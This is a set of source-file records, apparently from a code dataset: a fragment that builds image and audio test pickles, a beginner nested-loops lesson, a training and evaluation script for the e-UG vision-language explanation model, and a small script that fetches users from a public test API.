a = random.sample(images[j],1)[0]
# del images[j][images[j].index(a)]
tempaud0[x].append(a)
tempimg0[x][1:] = random.sample(tempimg[x][1:],len(tempimg0[x][1:]))
tempaud0[x][1:] = random.sample(tempaud[x][1:],len(tempaud0[x][1:]))
tempimg += tempimg0
tempaud += tempaud0
if z==3:
for x,i in enumerate(bucket):
for y,j in enumerate(random.sample(bucket[:x]+bucket[x:],10)):
b = random.sample(audios[img2lab[j]],1)[0]
# del audios[img2lab[j]][audios[img2lab[j]].index(b)]
tempimg3[x].append(b)
for y,j in enumerate(random.sample(bucket[:x]+bucket[x:],10)):
a = random.sample(images[j],1)[0]
# del images[j][images[j].index(a)]
tempaud3[x].append(a)
tempimg3[x][1:] = random.sample(tempimg[x][1:],len(tempimg3[x][1:]))
tempaud3[x][1:] = random.sample(tempaud[x][1:],len(tempaud3[x][1:]))
tempimg += tempimg3
tempaud += tempaud3
imgtest.append([tuple(i) for i in tempimg])
audtest.append([tuple(i) for i in tempaud])
with open('imgtest.pkl','wb+') as fp:
pickle.dump(imgtest,fp)
with open('audtest.pkl','wb+') as fp:
pickle.dump(audtest,fp)
with open('train.pkl','wb+') as fp:
pickle.dump(train2,fp)
def gen():
for i in [56,2,6,7,2,5,8,9,4,2,21,4,7]:
yield i
for i in [67,2,56,68,24]:
yield i
| [
"venkat201097@gmail.com"
] | venkat201097@gmail.com |
fcf1f8608278a54122b87c6d5a57e67e6a09ef64 | 59f769b1b097e5a9ea87fded206fe48f114e496a | /Unit2-LoopsAndLists/lesson5-NestedLoops.py | c7c07fe9e38af1370ade8713a2c766656b8b575c | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | JoshOrndorff/LearnPythonByExample | 78c3336b29653f5c5ffd226cc24e64ab360919a4 | bb4376249203938ed71e9bc59da35d7ddb3fd73f | refs/heads/master | 2021-01-10T16:37:29.724093 | 2018-06-11T16:14:17 | 2018-06-11T16:14:17 | 51,013,960 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,482 | py | # Create two empty lists. Both of which will be populated with numbers
numbers = []
otherNumbers = []
print("Tell three numbers.")
# Use the range function to loop three times.
# The looping variable i will iterate through the numbers 0, 1, 2
# But I'll never use them. It is okay to use a simple variable name like i
# when you are just looping through integers.
for i in range(3):
number = int(input("> "))
numbers.append(number)
# The same loop to get three more numbers for the second list.
print("Tell me three more numbers.")
for i in range(3):
number = int(input("> "))
otherNumbers.append(number)
# We'll check whether any of the numbers appear in both lists. Since we haven't
# started yet, we haven't foudn any matches yet. I'll make a variable to
# represent that.
matchFound = False
# I'll also make counters for each loop. You'll use these in the exercises.
outerLoopCounter = 0
innerLoopCounter = 0
# In order to do this we have to compare each number in the first list with each
# number in the second list. The word 'each' usually indicates that you'll want
# to use a for loop.
for number in numbers:
# This outer loop will loop us through each item in the first loop.
# For a given number in the first list, we will need to compare to each item
# in the second list. So we need to loop through the second list as well.
for otherNumber in otherNumbers:
# Now that we have selected a number from each list, we just compare them.
if number == otherNumber:
matchFound = True
# Now that we have compared all the possibilities, we just have to tell the user
# whether there were any matches. Note that matchFound is a Boolean, so I don't
# neem to use a comparison operator (eg. don't have to use matchFound == True).
if matchFound:
print("There was overlap between the lists.")
else:
print("There was no overlap between the lists.")
# Here we'll show how many times each loop ran. These won't work until you
# complete exercise 1.
#print("The outer loop ran {} times.".format(outerLoopCounter))
#print("The inner loop ran {} times.".format(innerLoopCounter))
# ---------------- Exercises -----------------
# 1. I made counter variables to keep track of how many times each loop ran.
# In order to make those counters work, increment the variables each time
# through the corresponding loop. Then uncomment lines 60 and 61 to see the
# results. Make predictions of what the results will be.
# 2. Right now the program just tells us whether there was any overlap, but does
# not tell us which numbers overlap. Make a new list called overlap, on line
# 4 and add all of the overlapping numbers to it.
# Then, at the end, tell us which numbers were in both lists.
# 3. This program has both lists the same length. Is that necessary? What if the
# first list is longer? Change the code so that the first list has five
# numbers. Predict whether it will still work, and how many times each loop
# will run.
# 4. ADVANCED: This program uses only two lists. Modify the program to have
# three lists, and discover whether any numbers were in all three.
# Making this change will change the line numbers, so my references might not
# make sense anymore.
# 5. ADVANCED: I use two different loops (on lines 11 and 17) to create the two
# original lists. These could also be combined into one nested loop. Modify
# these lines to use nested loops to take the input numbers.
| [
"admin@joshorndorff.com"
] | admin@joshorndorff.com |
dfdb47b1b83f8a4f7b1b93241c668962e9b6b4a1 | bd83af8c0bb98468d48b962ca302e36ec4dfbca7 | /eUG.py | 20b446d3e798dc92c3b26dba59e9fa830704e0b6 | [] | no_license | kochsnow/e-ViL | f1e31dc3ca844cc403c76cf8685d63e2cab24dcc | 94f17f5c189573c9d1087f82eb27db37690fc810 | refs/heads/main | 2023-08-28T03:54:37.237757 | 2021-10-11T16:14:08 | 2021-10-11T16:14:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,174 | py | # Copyright 2020 https://github.com/YIKUAN8/Transformers-VQA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import numpy as np
import collections
import torch
import torch.nn as nn
from torch.utils.data.dataloader import DataLoader
from tqdm import tqdm
from time import gmtime, strftime
from param import args
import random
import json
print(f"process ID: {os.getpid()}")
from transformers import get_linear_schedule_with_warmup
from datasets import load_metric
from tensorboardX import SummaryWriter
from src.nlg_eval import eval_nlp_scores, input_subset, get_nlg_scores
from eUG_model import eUGModel, binary_to_mp
from eViL_data import eViLDataset, eViLTorchDataset, VQAXEvaluator, bbox_collate
from eUG_generation import generate_text
from src.expl_tokenization import VCRGpt2Tokenizer
DataTuple = collections.namedtuple("DataTuple", "dataset loader evaluator")
def ctime():
return strftime("%Y-%m-%d %H:%M:%S", gmtime())
def print_log(args, log_str):
with open(os.path.join(args.output, "log.log"), "a") as f:
f.write(log_str)
f.flush()
def print_dict(dicto):
out_str = ""
for k, v in dicto.items():
out_str += f"{k}: {v:.3f} | "
return out_str
def map_vcr_tag_to_num(expl):
dets = ["<|det" + str(i) + "|>" for i in range(10)]
for idx, det in enumerate(dets):
expl = expl.replace(det, str(idx))
return expl
def get_data_tuple(splits: str, bs: int, shuffle=False, drop_last=False) -> DataTuple:
dset = eViLDataset(args, splits)
tset = eViLTorchDataset(args, dset, args.model)
evaluator = VQAXEvaluator(dset)
if args.task == "vqa_x":
collate_fn = None
else:
collate_fn = bbox_collate
data_loader = DataLoader(
tset,
batch_size=bs,
shuffle=shuffle,
num_workers=args.num_workers,
drop_last=drop_last,
pin_memory=True,
collate_fn=collate_fn,
)
return DataTuple(dataset=dset, loader=data_loader, evaluator=evaluator)
def dwa(prev_losses, temp=2):
    """
    Dynamic Weight Average (DWA). https://arxiv.org/abs/1803.10704

    Balances the VL-task classification loss against the explanation
    generation loss based on their recent rates of change.

    :param prev_losses: [task_loss_history, expl_loss_history] -- two lists
        of recorded loss values
    :param temp: softmax temperature for averaging the loss ratios
    :return: dict with weights for 'task' and 'expl' (they sum to 2)
    """
    num_tasks = 2
    # Not enough history yet -> fall back to equal weighting.
    if len(prev_losses[0]) <= 3:
        return {"task": 1, "expl": 1}
    task_ratio = prev_losses[0][-1] / prev_losses[0][-2]
    expl_ratio = prev_losses[1][-1] / prev_losses[1][-2]
    exp_task = np.exp(task_ratio / temp)
    exp_expl = np.exp(expl_ratio / temp)
    normalizer = exp_task + exp_expl
    return {
        "task": num_tasks * exp_task / normalizer,
        "expl": num_tasks * exp_expl / normalizer,
    }
def weighted_loss(task_loss, expl_loss, loss_weights, cweight):
    """Combine task and explanation losses after DWA weighting, boosting the
    task share *cweight*-fold while keeping the overall sum unchanged.

    :param task_loss: classification loss on the VL task
    :param expl_loss: language-generation loss of the explanation
    :param loss_weights: dict with 'task' and 'expl' weights (e.g. from dwa)
    :param cweight: how many times heavier the task loss should count
    """
    weighted_task = loss_weights["task"] * task_loss
    weighted_expl = loss_weights["expl"] * expl_loss
    # Scale factors chosen so the sum stays the same while the ratio between
    # the two components changes cweight-fold.
    total = float(weighted_task) + float(weighted_expl)
    expl_scale = total / (cweight * float(weighted_task) + float(weighted_expl))
    task_scale = cweight * expl_scale
    return task_scale * weighted_task + expl_scale * weighted_expl
def random_print_samples(sent, label, generated_explanations, label2ans):
    """
    Prints a random subset of generated explanations.

    Prints with probability len(sent)/100, so larger batches are sampled
    more often.  NOTE(review): this assumes len(sent) <= 100 -- for larger
    batches the probability vector handed to np.random.choice would be
    invalid; confirm against the configured batch sizes.
    """
    if np.random.choice(np.arange(0, 2), p=[1 - len(sent) / 100, len(sent) / 100]):
        idx = random.randrange(len(sent))
        question_ex = sent[idx]
        label_ex = label[idx]
        # VCR carries a per-question answer list; other tasks share one label map.
        if isinstance(label2ans[0], list):
            answer_ex = label2ans[idx][label_ex]
        else:
            answer_ex = label2ans[label_ex]
        explanation_ex = generated_explanations[idx]
        print(
            f"\n********** EVAL EXAMPLE ********** || Question: {question_ex} | Answer: {answer_ex} | Explanation: {explanation_ex}"
        )
def write_items(items, output_file):
    """Write one item per line (serialized via ``str``) to *output_file*.

    :param items: iterable of objects to write line-by-line
    :param output_file: path of the file to (over)write
    """
    # The context manager already closes the file; the original's extra
    # f.close() after the with-block was redundant and has been removed.
    with open(output_file, "w") as f:
        for item in items:
            f.write(str(item) + "\n")
class VQA:
    """End-to-end wrapper around the e-UG model.

    Builds the data pipelines from the module-level ``args``, trains the
    model (task loss, explanation loss, or both depending on
    ``args.train_type``), and runs evaluation including NLG scoring of the
    generated explanations.
    """

    def __init__(self):
        """Build data tuples (train/val or test), the eUG model, the loss
        function, optimizer and LR schedule according to the global ``args``."""
        self.train_type = args.train_type
        self.device = torch.device(args.device)
        # Dataloaders for train and val set
        if not args.test:
            self.valid_tuple = get_data_tuple(
                args.valid, bs=args.batch_size, shuffle=False, drop_last=False
            )
            self.train_tuple = get_data_tuple(
                args.train, bs=args.batch_size, shuffle=True, drop_last=True
            )
            num_answers = self.train_tuple.dataset.num_answers
            file_name = args.train
            log_str = f"\n{ctime()} || Loaded train set of size {len(self.train_tuple[0])} and val set of size {len(self.valid_tuple[0])}."
        else:
            self.test_tuple = get_data_tuple(
                args.test, bs=args.batch_size, shuffle=False, drop_last=False
            )
            num_answers = self.test_tuple.dataset.num_answers
            file_name = args.test
            log_str = (
                f"\n{ctime()} || Loaded test set of size {len(self.test_tuple[0])}."
            )
        # get dataset name
        self.dtype = args.task
        # Model
        self.model = eUGModel(self.train_type, num_answers, self.dtype, args.model)
        # Load pre-trained weights
        if self.train_type == "expl" and args.bb_path is not None:
            self.model.load_state_dict(torch.load(args.bb_path))
            # freeze backbone
            # NOTE(review): named_parameters() yields (name, tensor); the loop
            # binds the name to ``p`` and the tensor to ``n`` -- the variable
            # names are swapped, but requires_grad is set on the tensor, so
            # the effect (freezing everything outside the GPT-2 decoder) is
            # correct.
            for p, n in self.model.named_parameters():
                if "decoder.model.transformer" not in p:
                    n.requires_grad = False
        elif args.load_pretrained is not None:
            self.model.encoder.load(args.load_pretrained)
        self.model = self.model.to(self.device)
        # Loss and Optimizer
        if not args.test:
            # VQA-X uses soft (multi-hot) targets, the other tasks hard labels.
            if self.dtype == "vqa_x":
                self.loss_func = nn.BCEWithLogitsLoss()
            else:
                self.loss_func = nn.CrossEntropyLoss()
            batch_per_epoch = len(self.train_tuple.loader) / args.grad_accum
            t_total = int(batch_per_epoch * args.epochs)
            if "bert" in args.optim:
                print("BertAdam Total Iters: %d" % t_total)
                from src.optimization import BertAdam
                self.optim = BertAdam(
                    list(self.model.parameters()),
                    lr=args.lr,
                    warmup=0.1,
                    t_total=t_total,
                )
            else:
                self.optim = args.optimizer(self.model.parameters(), args.lr)
            self.scheduler = get_linear_schedule_with_warmup(
                self.optim,
                num_warmup_steps=args.warmup_steps,
                num_training_steps=t_total,
            )
        self.grad_accum = args.grad_accum
        # Output Directory
        self.output = args.output
        self.save_steps = args.save_steps
        os.makedirs(self.output, exist_ok=True)
        # print logs
        log_str += f"\n{ctime()} || Model loaded. Batch size {args.batch_size*args.grad_accum} | lr {args.lr} | task: {self.dtype} | type: {self.train_type}."
        print_log(args, log_str)

    def train(self, train_tuple, eval_tuple):
        """Run the full training loop with gradient accumulation, periodic
        evaluation every ``self.save_steps`` optimizer steps, TensorBoard
        logging, and checkpointing of the best task / explanation / overall
        models.

        :param train_tuple: DataTuple used for training
        :param eval_tuple: DataTuple used for validation
        """
        tb_writer = SummaryWriter(self.output)
        dset, loader, evaluator = train_tuple
        iter_wrapper = (
            (lambda x: tqdm(x, total=len(loader))) if args.tqdm else (lambda x: x)
        )
        # logger initialisations
        best_task = 0.0  # this refers to the model with the best S_T score
        best_expl = 0.0  # this refers to the model with the best S_E score
        best_global = 0.0  # this refers to the model with the best S_O score
        prev_losses = [[1], [1]]
        prev_task, prev_expl = 0, 0
        global_step = 0
        t_loss, tt_loss, te_loss = 0, 0, 0
        step_per_eval = 0
        for epoch in range(args.epochs):
            quesid2ans = {}
            for i, (
                ques_id,
                feats,
                boxes,
                sent,
                target,
                expl,
                answer_choices,
            ) in iter_wrapper(enumerate(loader)):
                self.model.train()
                self.optim.zero_grad()
                expl_gt = target
                if self.dtype == "vcr":
                    model_dict = answer_choices
                    target = target.flatten()
                else:
                    model_dict = dset.label2ans
                logit, output, _, _, _ = self.model(
                    feats.to(self.device),
                    boxes.to(self.device),
                    sent,
                    expl,
                    answer_choices,
                    model_dict,
                    expl_gt,
                )
                # Scale the classification loss to a comparable magnitude per task.
                if self.dtype == "vqa_x":
                    loss_multiplier = logit.size(1)
                elif self.dtype == "vcr":
                    loss_multiplier = 4
                else:
                    loss_multiplier = 1
                if self.train_type == "all":
                    task_loss = (
                        self.loss_func(logit, target.to(self.device)) * loss_multiplier
                    )
                    expl_loss = output[0]
                    # NOTE(review): DWA weighting is disabled here in favour of
                    # fixed equal weights; prev_losses is still recorded below
                    # so DWA can be re-enabled.
                    # loss_weights = dwa(prev_losses, temp=args.temperature)
                    loss_weights = {"task": 1, "expl": 1}
                    # loss = loss_weights['task']*task_loss + loss_weights['expl']*expl_loss
                    loss = weighted_loss(
                        task_loss, expl_loss, loss_weights, args.classifier_weight
                    )
                    loss /= self.grad_accum
                    prev_task += float(task_loss)
                    prev_expl += float(expl_loss)
                    # record loss for every 1024 datapoints
                    if (i + 1) % int((1024 / args.batch_size)) == 0:
                        prev_losses[0].append(prev_task / (1024 / args.batch_size))
                        prev_losses[1].append(prev_expl / (1024 / args.batch_size))
                        prev_task, prev_expl = 0, 0
                elif self.train_type == "bb":
                    loss = (
                        self.loss_func(logit, target.to(self.device)) * loss_multiplier
                    )
                    loss /= self.grad_accum
                    task_loss = float(loss)
                    expl_loss = 0
                elif self.train_type == "expl":
                    loss = output[0]
                    loss /= self.grad_accum
                    task_loss = 0
                    expl_loss = float(loss)
                loss.backward()
                if self.dtype == "vcr":
                    logit = binary_to_mp(logit)
                score, label = logit.max(1)
                if not isinstance(ques_id, list):
                    ques_id = ques_id.cpu().numpy()
                if self.dtype == "vcr":  # vcr
                    for qid, l in zip(ques_id, label.cpu().numpy()):
                        ans = dset.label2ans[qid][l]
                        quesid2ans[qid] = ans
                else:
                    for qid, l in zip(ques_id, label.cpu().numpy()):
                        ans = dset.label2ans[l]
                        quesid2ans[qid] = ans
                t_loss += float(loss) * self.grad_accum
                tt_loss += float(task_loss)
                te_loss += float(expl_loss)
                step_per_eval += 1
                # global step
                # grad accum snippet: https://gist.github.com/thomwolf/ac7a7da6b1888c2eeac8ac8b9b05d3d3
                if (i + 1) % self.grad_accum == 0:
                    nn.utils.clip_grad_norm_(self.model.parameters(), 5.0)
                    self.optim.step()
                    # NOTE(review): construction above checks '"bert" in
                    # args.optim' while this check is 'args.optim != "bert"' --
                    # an optimizer name that merely contains "bert" would get
                    # BertAdam AND this scheduler; confirm intended values.
                    if args.optim != "bert":
                        self.scheduler.step()  # Update learning rate schedule
                    # logging
                    tb_writer.add_scalar("task loss", task_loss, global_step)
                    tb_writer.add_scalar("explanation loss", expl_loss, global_step)
                    tb_writer.add_scalar(
                        "total loss", float(loss) * self.grad_accum, global_step
                    )
                    if self.train_type == "all":
                        tb_writer.add_scalar(
                            "task weight", loss_weights["task"], global_step
                        )
                        tb_writer.add_scalar(
                            "explanation weight", loss_weights["expl"], global_step
                        )
                    global_step += 1
                    # do eval
                    if self.save_steps > 0 and global_step % self.save_steps == 0:
                        log_str = f"\n\n{ctime()} || EVALUATION TIME"
                        log_str += f"\nEpoch-step {epoch}-{global_step}: Loss {t_loss/step_per_eval:.2f} | Task loss {tt_loss/step_per_eval:.2f} | Expl loss {te_loss/step_per_eval:.2f} | Train acc {evaluator.evaluate(quesid2ans)[0]:.2f}"
                        print_log(args, log_str)
                        t_loss, tt_loss, te_loss = 0, 0, 0
                        step_per_eval = 0
                        if self.valid_tuple is not None:  # Do Validation
                            valid_score, valid_perplexity, nlg_scores = self.evaluate(
                                eval_tuple
                            )
                            # no explanations generated
                            if not nlg_scores:
                                if valid_score > best_task:
                                    best_task = valid_score
                                    self.save("best_task")
                                log_str = f"\nEpoch-step {epoch}-{global_step}: Valid Score: {valid_score:.3f} | Best Valid Score: {best_task:.3f}"
                                tb_writer.add_scalar(
                                    "valid_task_score", valid_score * 100.0, global_step
                                )
                                tb_writer.add_scalar(
                                    "valid_expl_perplexity",
                                    valid_perplexity * 100.0,
                                    global_step,
                                )
                                print_log(args, log_str)
                                continue
                            if valid_score > best_task:
                                best_task = valid_score
                                self.save("best_task")
                            if self.train_type == "bb":
                                nlg_avg = 0
                                global_score = 0
                                valid_perplexity = 0
                            else:
                                global_score = nlg_scores["global_score"]
                                if global_score > best_global:
                                    best_global = global_score
                                    self.save("best_global")
                                nlg_avg = nlg_scores["avg_all"]
                                if nlg_avg > best_expl:
                                    best_expl = nlg_avg
                                    self.save("best_expl")
                            log_str = f"\nEpoch-step {epoch}-{global_step}: Valid Score: {valid_score:.3f} | NLG average: {nlg_avg:.3f} | Global score: {global_score:.3f}"
                            log_str += f"\nEpoch-step {epoch}-{global_step}: Best Valid Score: {best_task:.3f} | Best NLG: {best_expl:.3f} | Best overall: {best_global:.3f}"
                            tb_writer.add_scalar(
                                "valid_task_score", valid_score * 100.0, global_step
                            )
                            tb_writer.add_scalar(
                                "valid_expl_perplexity",
                                valid_perplexity * 100.0,
                                global_step,
                            )
                            if nlg_scores:
                                log_str += f"\nEpoch-step {epoch}-{global_step}: {print_dict(nlg_scores)}"
                                for k, v in nlg_scores.items():
                                    tb_writer.add_scalar(k, v, global_step)
                            print(log_str, end="")
                            print_log(args, log_str)
                            tb_writer.flush()
        self.save("LAST")
        tb_writer.close()

    def predict(self, train_type, eval_tuple: DataTuple, dump=None, gen_dump=None):
        """
        Predict the answers to questions in a data split.

        Also (for non-backbone train types) generates explanations for
        correctly answered questions and scores them with NLG metrics.

        :param train_type: "all", "bb" or "expl" -- controls explanation eval
        :param eval_tuple: The data tuple to be evaluated.
        :param dump: The path of saved file to dump results.
        :param gen_dump: path for the per-question generation records; when
            set, scores and generations are written to args.output.
        :return: tuple (task score, explanation perplexity, NLG score dict or None)
        """
        self.model.eval()
        dset, loader, evaluator = eval_tuple
        quesid2ans = {}
        expl_loss = 0.0
        nb_eval_steps = 0
        generated_explanations = None
        test_output = []
        if "bb" not in train_type:
            # initialisations for NL evaluation
            try:
                bert_metric = load_metric(
                    "bertscore",
                    experiment_id=str(random.randrange(999999)),
                    device=self.device,
                )
            except:
                bert_metric = None
            all_generated_explanations = []
            all_gt_expls = []
            tokenizer = VCRGpt2Tokenizer.from_pretrained("gpt2")
            gen_model = self.model.decoder.model.to(self.device)
        for i, datum_tuple in enumerate(loader):
            ques_id, feats, boxes, sent, label, expl, answers = datum_tuple
            # gt_cond: condition generation on the ground-truth answer.
            if args.gt_cond:
                gt = label
            else:
                gt = None
            if self.dtype == "vcr":  # different label dict
                model_dict = answers
            else:
                model_dict = dset.label2ans
            if self.dtype == "vqa_x":  # multiple explanations
                triple_expl = [[x[y] for x in expl] for y in range(len(expl[0]))]
                expl = expl[0]
            else:
                triple_expl = None
            with torch.no_grad():
                feats, boxes = feats.to(self.device), boxes.to(self.device)
                (
                    logit,
                    expl_output,
                    input_ids,
                    token_type_ids,
                    visual_representations,
                ) = self.model(feats, boxes, sent, expl, answers, model_dict, gt)
            # get indices for when to generate explanations
            if self.dtype == "vqa_x":
                if args.gt_cond:
                    logit = label
                # A prediction counts as correct if its soft target is non-zero.
                correct_indices = []
                for idx, prediction in enumerate(
                    list(torch.argmax(logit, 1).detach().cpu().numpy())
                ):
                    if float(label[idx][prediction]) != 0:
                        correct_indices.append(idx)
                correct_indices = torch.tensor(correct_indices)
            elif self.dtype == "vcr":
                logit = binary_to_mp(logit)  # transform binary labels into 4-way
                correct_indices = (
                    torch.where(label.argmax(1) == logit.cpu().argmax(1))[0]
                    .detach()
                    .cpu()
                )
            else:
                correct_indices = (
                    torch.where(label.to(self.device) == torch.argmax(logit, 1))[0]
                    .detach()
                    .cpu()
                )
            if args.gt_cond:
                # NOTE(review): torch.range is deprecated (inclusive end);
                # torch.arange(label.size(0)) would be the modern equivalent.
                correct_indices = torch.range(0, label.size(0) - 1, dtype=int)
            # populate quesid2ans (where ans is predicted ans)
            if not isinstance(ques_id, list):
                ques_id = ques_id.cpu().numpy()
            score, label = logit.max(1)
            if self.dtype == "vcr":
                for qid, l in zip(ques_id, label.cpu().numpy()):
                    ans = dset.label2ans[qid][l]
                    quesid2ans[qid] = ans
            else:
                for qid, l in zip(ques_id, label.cpu().numpy()):
                    ans = dset.label2ans[l]
                    quesid2ans[qid] = ans
            # generate and evaluate explanations
            get_gen_expl = 0
            if "bb" not in train_type:
                expl_loss += expl_output[0].mean().item()
                # only evaluate random subset during validation to save time
                if args.test:
                    get_gen_expl = 1
                else:
                    get_gen_expl = np.random.choice(
                        np.arange(0, 2), p=[1 - args.prob_eval, args.prob_eval]
                    )
                # get subset where label was predicted correctly
                (
                    input_ids,
                    token_type_ids,
                    visual_representations,
                    expl,
                    triple_expl,
                ) = input_subset(
                    correct_indices,
                    input_ids,
                    token_type_ids,
                    visual_representations,
                    expl,
                    triple_expl,
                    self.device,
                )
                generated_explanations = None
                if input_ids.shape[0] != 0:  # if not all predictions were wrong
                    if get_gen_expl:
                        generated_explanations = generate_text(
                            gen_model,
                            tokenizer,
                            input_ids,
                            token_type_ids,
                            visual_representations,
                            max_rationale_length=51,
                        )
                        if self.dtype == "vcr":
                            expl = [
                                map_vcr_tag_to_num(x) for x in expl
                            ]  # to make sure same kind of explanations are compared
                        # free memory
                        input_ids, token_type_ids, visual_representations = (
                            None,
                            None,
                            None,
                        )
                        if self.dtype == "vqa_x":
                            try:
                                bert_metric.add_batch(
                                    predictions=generated_explanations,
                                    references=triple_expl,
                                )
                            except:
                                print("BertScore failed")
                            all_gt_expls.extend(triple_expl)
                        else:
                            try:
                                bert_metric.add_batch(
                                    predictions=generated_explanations,
                                    references=expl,
                                )
                            except:
                                print("BertScore failed")
                            all_gt_expls.extend(expl)
                        all_generated_explanations.extend(generated_explanations)
                        # printing examples during eval
                        if not args.test:
                            if self.dtype == "vcr":
                                labels = [
                                    label[i].max(0)[1].item()
                                    for i in correct_indices
                                ]
                                model_dict = [answers[i] for i in correct_indices]
                            else:
                                labels = [label[i].item() for i in correct_indices]
                            random_print_samples(
                                [sent[i] for i in correct_indices],
                                labels,
                                generated_explanations,
                                model_dict,
                            )
            # Spread the generated explanations (for correct answers only)
            # back over the full batch; wrong answers keep the "None" marker.
            gen_expl_all = len(ques_id) * ["None"]
            if generated_explanations:
                for ci, gen_expl in zip(correct_indices, generated_explanations):
                    gen_expl_all[ci] = gen_expl
            # write explanations to file
            if gen_dump:
                for idx, (qid, gen_expl) in enumerate(
                    zip(list(ques_id), gen_expl_all)
                ):
                    input_record = {}
                    input_record["question_id"] = str(qid)
                    input_record["question"] = dset.id2datum[qid]["sent"]
                    input_record["generated_explanation"] = gen_expl
                    if self.dtype == "vcr":
                        input_record["correct_explanations"] = (
                            dset.id2datum[qid]["explanation"]
                            .replace("<|det", "")
                            .replace("|>", "")
                        )
                    else:
                        input_record["correct_explanations"] = dset.id2datum[qid][
                            "explanation"
                        ]
                    input_record["prediction"] = quesid2ans[qid]
                    input_record["gt"] = dset.id2datum[qid]["label"]
                    if self.dtype == "vcr":
                        input_record["img_id"] = dset.id2datum[qid]["raw_img_id"]
                        input_record["movie"] = dset.id2datum[qid]["movie"]
                        input_record["answer_choices"] = [
                            x.replace("<|det", "").replace("|>", "")
                            for x in dset.id2datum[qid]["answer_choices"]
                        ]
                    # NOTE(review): the rest of the file spells this task
                    # "vqa_x"; as written this branch never matches and VQA-X
                    # falls through to the else -- confirm whether "vqax" is a
                    # typo.
                    elif self.dtype == "vqax":
                        input_record["img_id"] = dset.id2datum[qid]["img_id"]
                    else:
                        input_record["img_id"] = str(qid)[:-5]
                    if idx in list(correct_indices.numpy()):
                        input_record["correct"] = 1
                    else:
                        input_record["correct"] = 0
                    test_output.append(input_record)
            nb_eval_steps += 1
        valid_score, correct_idx = eval_tuple.evaluator.evaluate(quesid2ans)
        nlg_weight = correct_idx.count(1) / len(
            correct_idx
        )  # because for vqa-x we also take half-correct answers
        # getting perplexity
        expl_loss = expl_loss / nb_eval_steps
        perplexity = torch.exp(torch.tensor(expl_loss)).item()
        if "bb" not in train_type and len(all_generated_explanations) != 0:
            # getting NLG metrics
            nlg_global_scores = get_nlg_scores(
                self.dtype,
                all_generated_explanations,
                all_gt_expls,
                bert_metric,
                self.device,
            )
            nlg_global_scores["global_score"] = (
                nlg_global_scores["avg_all"] * nlg_weight
            )
            if not nlg_global_scores["global_score"]:
                nlg_global_scores["global_score"] = 0
            if gen_dump is not None:
                scores_to_print = nlg_global_scores
                scores_to_print["task_score"] = valid_score
                write_items(
                    [json.dumps(r) for r in ["scores", scores_to_print]],
                    os.path.join(args.output, "scores.json"),
                )
                write_items(
                    [json.dumps(r) for r in test_output],
                    os.path.join(args.output, "gen_test.json"),
                )
            return valid_score, perplexity, nlg_global_scores
        else:
            scores_to_print = {"task_score": valid_score}
            print("Task Score: ", valid_score)
            write_items(
                [json.dumps(r) for r in ["scores", scores_to_print]],
                os.path.join(args.output, "scores.json"),
            )
            return valid_score, perplexity, None

    def evaluate(self, eval_tuple: DataTuple, dump=None):
        """Evaluate all data in data_tuple."""
        valid_score, expl_perplexity, nlg_global_scores = self.predict(
            self.train_type, eval_tuple, dump
        )
        return valid_score, expl_perplexity, nlg_global_scores

    @staticmethod
    def oracle_score(data_tuple):
        """
        Purpose: upper-bound accuracy of the evaluator -- score obtained when
        always answering with the highest-weighted ground-truth label.
        """
        dset, loader, evaluator = data_tuple
        quesid2ans = {}
        for i, (ques_id, feats, boxes, sent, target) in enumerate(loader):
            _, label = target.max(1)
            for qid, l in zip(ques_id, label.cpu().numpy()):
                ans = dset.label2ans[l]
                quesid2ans[qid.item()] = ans
        return evaluator.evaluate(quesid2ans)

    def save(self, name):
        """Save the model weights as ``<output>/<name>.pth``."""
        torch.save(self.model.state_dict(), os.path.join(self.output, "%s.pth" % name))

    def load(self, path):
        """Load model weights from ``<path>.pth`` (CPU map, non-strict)."""
        print("Load model from %s" % path)
        state_dict = torch.load("%s.pth" % path, map_location=torch.device("cpu"))
        self.model.load_state_dict(state_dict, strict=False)
        self.model = self.model.to(self.device)
if __name__ == "__main__":
# logging
if not os.path.exists(args.output):
os.makedirs(args.output)
print_log(args, "\n" + str(args) + "\n")
tb_path = os.path.join(os.getcwd(), args.output)
log_str = f"\ntensorboard dev upload --logdir {tb_path} --name ug-tt_{args.train_type}-bs{args.batch_size*args.grad_accum}-lr{args.lr}-t{args.temperature}"
log_str += f"\n Device: {torch.cuda.current_device()}"
log_str += f"\n Process ID: {os.getpid()}"
print_log(args, log_str)
# Build Class
vqa = VQA()
# Load VQA model weights
if args.load_trained is not None:
vqa.load(args.load_trained)
# Test or Train
if args.test:
valid_score, perplexity, nlg_global_scores = vqa.predict(
args.train_type,
vqa.test_tuple,
dump=os.path.join(args.output, "test_predict.json"),
gen_dump=os.path.join(args.output, "gen_output.json"),
)
else:
print("Splits in Train data:", vqa.train_tuple.dataset.splits)
if vqa.valid_tuple is not None:
print("Splits in Valid data:", vqa.valid_tuple.dataset.splits)
# print("Valid Oracle: %0.2f" % (vqa.oracle_score(vqa.valid_tuple) * 100))
else:
print("DO NOT USE VALIDATION")
vqa.train(vqa.train_tuple, vqa.valid_tuple)
| [
"kayser.mg@gmail.com"
] | kayser.mg@gmail.com |
7e8bfdaf5d0513e3ea02320d09a1540ba58cc633 | c76551af998ffa71b242726c4083363661357857 | /app/fetch_user_data.py | 1a2418fc91b427c4f4544cff4e48c15054f3a9a5 | [] | no_license | meliyahu/python-pytest | 7a1f76e5e72acc8c3420f9775dcd06a846f913e9 | c0f552a84f58e198be64bf6f74699402e37f1f93 | refs/heads/master | 2022-12-09T12:11:27.480138 | 2022-04-22T08:00:28 | 2022-04-22T08:00:28 | 225,743,430 | 0 | 0 | null | 2022-12-08T14:26:28 | 2019-12-04T00:24:08 | Python | UTF-8 | Python | false | false | 2,004 | py | import requests
import jsonpath
import json
url = 'https://reqres.in/api/users?page=2'
def get_users():
    """Fetch page 2 of the users API and pretty-print the JSON body."""
    reply = requests.get(url)
    assert reply.status_code == 200
    print(f'STATUS: {reply.status_code}')
    body = json.loads(reply.content)
    print(json.dumps(body, indent=4, sort_keys=True))
